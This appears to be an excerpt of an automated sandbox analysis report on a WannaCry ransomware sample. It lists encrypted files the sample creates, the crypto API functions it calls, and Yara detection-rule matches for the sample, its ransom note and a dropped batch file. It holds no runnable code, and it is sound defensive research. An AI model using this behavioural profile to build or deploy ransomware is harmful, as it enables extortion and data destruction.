Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.WNCRYT entropy: 7.99374163114	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRYT entropy: 7.99980591469	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\Desktop\s.wnry entropy: 7.998263053	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\Desktop\t.wnry entropy: 7.99727613788	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT entropy: 7.99959441244	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.WNCRYT entropy: 7.99723437288	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERC09F.tmp.csv.WNCRYT entropy: 7.99754477808	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY (copy) entropy: 7.99959441244	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\WER\Temp\WERC09F.tmp.csv.WNCRY (copy) entropy: 7.99754477808	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\acrobat_sbx\acroNGLLog.txt.WNCRY (copy) entropy: 7.99369980005	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt.WNCRY (copy) entropy: 7.99792560574	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRY (copy) entropy: 7.99973204144	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\X98HJ34F\hero-image-desktop-f6720a4145[1].jpg.WNCRY (copy) entropy: 7.99863285725	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409652260521575.txt.WNCRY (copy) entropy: 7.99831718978	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409652279466572.txt.WNCRY (copy) entropy: 7.99806948856	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409652308544336.txt.WNCRY (copy) entropy: 7.99820232984	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409652528024801.txt.WNCRY (copy) entropy: 7.99833031846	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409652546374009.txt.WNCRY (copy) entropy: 7.99835443015	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409652624730194.txt.WNCRY (copy) entropy: 7.99810896784	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409652666852676.txt.WNCRY (copy) entropy: 7.99819340017	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409652950926221.txt.WNCRY (copy) entropy: 7.998096778	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409653224421742.txt.WNCRY (copy) entropy: 7.99835021248	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409653524527350.txt.WNCRY (copy) entropy: 7.9983155161	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409655232786058.txt.WNCRY (copy) entropy: 7.99849639145	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409656564963692.txt.WNCRY (copy) entropy: 7.9986942799	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409657271224821.txt.WNCRY (copy) entropy: 7.99838222604	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409658240427405.txt.WNCRY (copy) entropy: 7.99864950414	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409658433494739.txt.WNCRY (copy) entropy: 7.99867381221	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409658477995265.txt.WNCRY (copy) entropy: 7.99837000707	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409658976474171.txt.WNCRY (copy) entropy: 7.99844015597	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409659009848568.txt.WNCRY (copy) entropy: 7.99849179612	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409659276420550.txt.WNCRY (copy) entropy: 7.99842334814	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409659576386340.txt.WNCRY (copy) entropy: 7.99821974649	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409659909628426.txt.WNCRY (copy) entropy: 7.99840959886	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664250150656855.txt.WNCRY (copy) entropy: 7.99829218332	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664250451283842.txt.WNCRY (copy) entropy: 7.99836071172	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{65911048-9234-4059-8bb1-0549c23de5a1}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99487953514	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{6c5c99b8-fa5e-49d0-8af3-659a6305e839}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99498738738	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{9a386491-5394-47a0-a408-e4e3a9d60139}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99476570241	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f2609905-bc23-4c47-8645-cbcf38bc7d2c}\appsconversions.txt.WNCRY (copy) entropy: 7.99987483157	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f2609905-bc23-4c47-8645-cbcf38bc7d2c}\appsglobals.txt.WNCRY (copy) entropy: 7.99943924255	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f2609905-bc23-4c47-8645-cbcf38bc7d2c}\appssynonyms.txt.WNCRY (copy) entropy: 7.9991871944	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f2609905-bc23-4c47-8645-cbcf38bc7d2c}\settingsconversions.txt.WNCRY (copy) entropy: 7.99968463497	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f2609905-bc23-4c47-8645-cbcf38bc7d2c}\settingsglobals.txt.WNCRY (copy) entropy: 7.99575206976	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f2609905-bc23-4c47-8645-cbcf38bc7d2c}\settingssynonyms.txt.WNCRY (copy) entropy: 7.99842498605	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{2ce60361-e872-41fb-bae7-eec2f580d4fb}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99916748562	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{400a70c4-3e12-4cbe-805a-2dc7c298a033}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99917551213	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664308186704568.txt.WNCRY (copy) entropy: 7.99829356619	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{4d14c23e-7ce9-42c1-9a52-20871828d127}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99473133309	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.WNCRY (copy) entropy: 7.99723437288	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRY (copy) entropy: 7.99972384818	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\KAT9HXAG\hero-image-desktop-f6720a4145[1].jpg.WNCRY (copy) entropy: 7.99862900775	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409637954002018.txt.WNCRY (copy) entropy: 7.99824256097	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appsglobals.txt.WNCRY (copy) entropy: 7.99951534129	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appssynonyms.txt.WNCRY (copy) entropy: 7.99924368148	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\jones\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{3502d36d-7211-4995-af80-eced47ce4a6c}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.9950145719	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\jones\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{ed67b689-2200-491a-9730-3e54067afbf3}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99435419674	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\jones\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\appsconversions.txt.WNCRY (copy) entropy: 7.99987634502	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\jones\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingsconversions.txt.WNCRY (copy) entropy: 7.99966098033	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\jones\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingsglobals.txt.WNCRY (copy) entropy: 7.99582690762	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\jones\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingssynonyms.txt.WNCRY (copy) entropy: 7.99816776617	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\jones\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76cc83ea-ae96-47fc-9329-459e5ad2d67b}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99916534176	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\jones\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{97b27011-f8cc-4ac9-9531-d6ee8ce92324}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99932849162	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\jones\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.WNCRY (copy) entropy: 7.99757358725	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664308473525907.txt.WNCRY (copy) entropy: 7.99819018439	Jump to dropped file

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_00401861 CryptImportKey,	0_2_00401861
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_004018F9 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,	0_2_004018F9
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10003F00 GetFileAttributesA,GetFileAttributesA,CreateFileA,GetFileSize,GlobalAlloc,ReadFile,GetFileAttributesA,CryptImportKey,_local_unwind2,_local_unwind2,	0_2_10003F00
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10003AC0 CryptImportKey,CryptImportKey,CryptDestroyKey,	0_2_10003AC0
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10004440 CryptAcquireContextA,wcsrchr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,	0_2_10004440

System Summary

Malicious sample detected (through community Yara rule)

Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, type: SAMPLE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, type: SAMPLE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.2.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.8e9bb8.1.unpack, type: UNPACKEDPE	Matched rule: WanaCry Payload Author: kevoreilly
Source: 0.2.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.8e9bb8.1.raw.unpack, type: UNPACKEDPE	Matched rule: WanaCry Payload Author: kevoreilly
Source: 0.2.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.10000000.2.unpack, type: UNPACKEDPE	Matched rule: WanaCry Payload Author: kevoreilly
Source: 0.2.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 0.2.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.0.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 0.0.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000000.00000000.1256386714.000000000040E000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000000.00000002.3703395638.000000000040F000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\36751721951490.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
